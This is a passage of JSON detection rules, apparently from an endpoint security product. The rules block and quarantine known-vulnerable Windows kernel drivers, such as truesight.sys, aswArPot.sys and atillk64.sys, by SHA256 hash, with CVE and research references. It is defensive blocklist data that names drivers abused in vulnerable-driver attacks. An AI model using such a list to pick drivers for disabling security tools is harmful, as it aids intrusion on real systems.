+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.613684Z",
+ "creation_date": "2026-03-23T11:45:29.613686Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.613691Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "59626cac380d8fe0b80a6d4c4406d62ba0683a2f0f68d50ad506ca1b1cf25347",
+ "comment": "BioStar Microtech drivers vulnerable to kernel memory mapping function (aka BSMEMx64.sys, BSMIXP64.sys, BSMIx64.sys, BS_Flash64.sys, BS_HWMIO64_W10.sys, BS_HWMIo64.sys and BS_I2c64.sys) [https://www.loldrivers.io/drivers/9e87b6b0-00ed-4259-bcd7-05e2c924d58c/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "22fff223-e55b-55d8-a96e-11a065670946",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.487414Z",
+ "creation_date": "2026-03-23T11:45:31.487416Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.487421Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "09415d7d05fe9fd822bd538519e87285ce96bb25bd74e5f5f3e479c2ad575090",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23077d69-5079-5c66-bd1d-a39653d84e63",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.834080Z",
+ "creation_date": "2026-03-23T11:45:30.834083Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.834090Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8a73aaeb11ac9af921949053a51f15a1247d0d4d9b55ff95c9120e84c4d4d7e4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2311adfd-84be-50a9-a31f-48a910f32711",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807389Z",
+ "creation_date": "2026-03-23T11:45:31.807392Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807397Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2c2d6db4ea006fce9886dc66103394b47653f5cf2517556d179f3eb10d9687f2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "232760da-2173-585e-85fe-288a05c92a71",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.620964Z",
+ "creation_date": "2026-03-23T11:45:29.620966Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.620972Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8cb62c5d41148de416014f80bd1fd033fd4d2bd504cb05b90eeb6992a382d58f",
+ "comment": "Phoenix Technologies Vulnerable Physmem drivers (aka Agent64.sys) [https://www.loldrivers.io/drivers/5943b267-64f3-40d4-8669-354f23dec122/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "233e24d6-f1a2-5470-a8fd-37ab66a0bb5e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968927Z",
+ "creation_date": "2026-03-23T11:45:29.968929Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968935Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5bd41a29cbba0d24e639f49d1f201b9bd119b11f5e3b8a5fefa3a5c6f1e7692c",
+ "comment": "Avast Vulnerable Driver (aka aswArPot.sys) [CVE-2022-26522, CVE-2022-26523] [https://www.mandiant.com/resources/blog/unc2596-cuba-ransomware] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2341efe9-9c27-5866-91ba-de14a436f405",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480751Z",
+ "creation_date": "2026-03-23T11:45:30.480753Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480759Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "dd0bd7b8fae8e8835ba09118a02a06a51e111fccbe16916414844aab91cfeed4",
+ "comment": "Vulnerable Kernel Driver (aka TdkLib64.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23421092-b421-5be8-be73-bfcbaf552875",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.142844Z",
+ "creation_date": "2026-03-23T11:45:31.142846Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.142851Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0e1c390cd80d8e1e8552939d21f6710d21cca77a27ca7e393832ef5cf456bf7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "234f9fed-975e-5f7f-a788-c46d366b7904",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.811008Z",
+ "creation_date": "2026-03-23T11:45:31.811010Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.811016Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9ae7bc61efe7325bcf37099ad877ea20abcc381d9d05492146c5e2764b11622a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "235cb634-b380-58d5-b14e-b9d9b3181f4c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.153093Z",
+ "creation_date": "2026-03-23T11:45:31.153096Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.153104Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "879d4047295e37b3d185906588e0b7716097b45340e5244809cf0146599b9a6f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2365317d-1fbd-5069-af40-154f2bfdd34d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.820284Z",
+ "creation_date": "2026-03-23T11:45:30.820286Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820292Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "ba182292c25044e9abc89bcd2a846a4cd74485ce0c26413e5a859c516f9d89e2",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23715b8f-5e47-5729-8d93-1ae5aed6fe32",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.819625Z",
+ "creation_date": "2026-03-23T11:45:31.819628Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.819636Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7833b719290b7a877b1ac54d2734037c92c2bf1d4ec5f62beb213b16fd1d4ab4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2377b464-487c-5009-b34f-30ca02bdaf6a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.493994Z",
+ "creation_date": "2026-03-23T11:45:31.493998Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.494007Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a0c7f5abba359cd1db92da1eb19a5d269da2de0260f9687338071ebec00f2da5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2387bba0-4721-50bb-8240-323f484621c5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617378Z",
+ "creation_date": "2026-03-23T11:45:29.617380Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617386Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "61580186311f6260c6de7fa5bf9242d74687aa1c5c9fdf9d9a48eb46d67d636f",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2388a1a0-2a65-5ac6-be3d-66d738f75860",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.152668Z",
+ "creation_date": "2026-03-23T11:45:31.152670Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.152675Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "90e33eefb9c906e9930162b84a653a2503241956751184a94ab94d39f36516a2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "238e85b6-8c23-5781-a4a3-1692ebed5369",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.455959Z",
+ "creation_date": "2026-03-23T11:45:30.455963Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.455972Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "742b102cc69403c669244f0efcf9ac8e5bbdb9b10f35f03c743651afe5ac32ba",
+ "comment": "Vulnerable Kernel Driver (aka HWiNFO32.SYS) [https://www.loldrivers.io/drivers/2225128d-a23f-434a-aaee-69a88ea64fbd/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "238f9798-ecfe-5f5e-884c-34ebb284f9ec",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.499108Z",
+ "creation_date": "2026-03-23T11:45:31.499111Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.499119Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d69c4a3d8bd38413868d5bd5d6d134b5e99f892c74ef61616498be8e7679a9f7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "2394c20d-ec39-5646-9fea-99514be0732e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.968527Z",
+ "creation_date": "2026-03-23T11:45:29.968529Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.968535Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5",
+ "comment": "Vulnerable Kernel Driver (aka HpPortIox64.sys) [https://www.loldrivers.io/drivers/13637210-2e1c-45a4-9f76-fe38c3c34264/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23a4f77c-53aa-5169-91b3-f79a6564af0b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.155614Z",
+ "creation_date": "2026-03-23T11:45:31.155616Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.155622Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8c9058ca48a1ce381fe40f4dea553cf200ad3c146c16f83301ddcb8887b7269f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23ac62d0-92b9-5f19-a1b0-1a51ecebcea7",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.160535Z",
+ "creation_date": "2026-03-23T11:45:31.160537Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.160542Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "138f9f8dbff592c83bd409fce1e6ca83890deead587205f94a656549d202a00c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23b1a236-8b95-5747-aa05-29c2ab3dfb8e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.477254Z",
+ "creation_date": "2026-03-23T11:45:31.477258Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.477269Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7086cedfb56414413595dc2ddd595fcced21d1de5412406add7b9f2ad7951951",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23b4b8ca-9d2d-55b6-a44a-b906e25c3b74",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824515Z",
+ "creation_date": "2026-03-23T11:45:31.824518Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824527Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17564c465975cfded515991b4185606094eafaff3df48ea38fca6a27ddee4623",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "23b97a34-40c6-503f-af8c-0df284d4fb34",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
